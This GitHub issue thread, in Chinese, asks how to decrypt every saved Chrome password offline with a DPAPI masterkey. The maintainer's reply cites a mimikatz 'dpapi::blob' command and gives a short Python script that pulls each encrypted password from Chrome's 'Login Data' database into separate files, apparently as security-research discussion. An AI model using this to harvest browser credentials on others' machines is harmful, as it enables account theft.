### ISSUE TITLE
有个问题

### ISSUE THREAD

**Issue by wpf97** [3gstudent/feedback#23]
测试可以读出来密码，但是只能读取一条，如果有二条或者多条的话，读取的是最后一条密码，怎么读取全部的？

**Comment by wpf97** [comment]
利用Masterkey离线导出Chrome浏览器中保存的密码,是这篇文件

**Comment by 3gstudent** [comment]
@wpf97 

你是用masterkey解密获得密码的吗？

对应mimikatz的命令：`dpapi::blob /in test.txt`

如果是这个的话，接下来看它的实现代码：

https://github.com/gentilkiwi/mimikatz/blob/master/mimikatz/modules/dpapi/kuhl_m_dpapi.c#L32

一次只能解密一条

想要读取全部的，可以尝试改它的源码，或者把密文保存到不同的文件中，逐条解密

使用python脚本读取Login Data，每条数据保存到不同的文件中，代码如下：

```
from os import getenv
import sqlite3
import binascii
i = 0
conn = sqlite3.connect("Login Data")
cursor = conn.cursor()
cursor.execute('SELECT action_url, username_value, password_value FROM logins')
for result in cursor.fetchall():
    print (binascii.b2a_hex(result[2]))
    f = open('test' + str(i) + '.txt', 'wb')
    f.write(result[2])
    f.close()
    i = i+1
```
